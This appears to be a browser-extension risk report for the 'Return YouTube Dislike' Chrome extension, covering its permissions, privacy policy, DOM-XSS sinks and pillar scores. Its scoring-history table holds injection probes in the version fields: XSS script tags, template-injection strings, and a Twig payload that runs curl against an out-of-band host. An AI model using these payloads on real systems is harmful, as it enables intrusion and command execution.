Return YouTube Dislike
gebbhagfogifgggkldgodflihgfeippi
Risk Score
3.37
Risk Level:
Low
Recommendation:
🟢 LOW RISK — review
Top Risks
- Privacy policy is Google's generic account policy — not scoped to this extension; admits data collection and 3rd-party sharing.
- Developer uses free Gmail address with no business domain; brand_mention flags YouTube impersonation.
- 4× innerHTML DOM-XSS sinks with no CSP; if API response is ever tainted, XSS possible on YouTube pages.
- No CSP declared (MV3 so no MV2 penalty, but innerHTML sinks elevate risk in absence of CSP).
- 5M-install blast radius means any future compromise or supply-chain attack has very wide reach.
Evidence
- privacy_policy_generic store Policy URL is Google account policy; scope_extension=false, data_collection=true, third_party_sharing=true → +10.0 privacy.
- brand_impersonation store brand_mention.is_impersonation=true (YouTube), confirmed_owner=false, developer_email is gmail; verified+featured cap +1.0 rep.
- verified_publisher_featured store verified_publisher=true AND is_featured_by_google=true; reputation discounts applied but capped due to policy/monetization rules.
- dom_xss_sinks crx 4 innerHTML assignments in content-script and popup with no CSP; FIX B applied: csp_present=false → +2.0 code quality.
- host_permissions_scoped manifest host_permissions limited to youtube.com and returnyoutubedislikeapi.com; function-justified, no broad <all_urls>.
- gmail_dev_no_domain store Dev email selivano.d@gmail.com; free webmail, no developer_name, no business domain; reputation floor considerations applied.
- no_bad_hosts_no_cves crx bad_host_hits=[], affiliate_hits=[], cve_findings_raw=[], monetization_hits=[]; threat intel clean.
- install_count_high store 5,000,000 installs; +1.0+1.0+0.5 webstore, minus 0.5 popularity-trust for rating>=4.0.
Permissions Breakdown
- storage low Stores extension preferences locally; no sensitive data access.
- *://*.youtube.com/* medium Host permission scoped to YouTube only; matches stated function.
- *://returnyoutubedislikeapi.com/* low Host permission to extension's own API backend; expected for function.
- content_scripts: *://www.youtube.com/*, *://m.youtube.com/*, *://youtube.com/* medium Script injected into all YouTube pages; risk scoped to YouTube only.
Pillar Scores
Permissions1.50
Reputation5.00
Network2.00
Webstore3.50
Maintenance0.00
Privacy10.00
Code Quality2.00
CVE Exposure0.00
Scoring History
| v3.69212"();}]9562 | 2.91 | Low | review | 2026-08-05 |
| v3.6&n947355=v907098 | 3.28 | Low | review | 2026-08-05 |
| '"></script></input><img src=x onerror=alert(1)> | 3.38 | Low | review | 2026-07-29 |
| {{7*8}} | 3.68 | Low | review | 2026-07-29 |
| hello1 | 3.39 | Low | review | 2026-07-29 |
| v3.6"><script>B1cb(9645)</script> | 3.78 | Low | review | 2026-07-29 |
| <th:t="${dfb}#foreach | 3.14 | Low | review | 2026-07-29 |
| dfb__${98991*97996}__::.x | 3.09 | Low | review | 2026-07-29 |
| dfb[[${98991*97996}]]xca | 3.44 | Low | review | 2026-07-29 |
| <%={{={@{#{${dfb}}%> | 3.32 | Low | review | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitgbfcsfqeqx2f457.bxss.me")}} | 3.54 | Low | review | 2026-07-29 |
| v3.6&n922171=v993874 | 3.05 | Low | review | 2026-07-29 |
| v3.6 | 3.37 | Low | review | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:36
Listing SHA
54108a5261e4…
Force block
— not fired
Score recovered
no
Elapsed
29.9s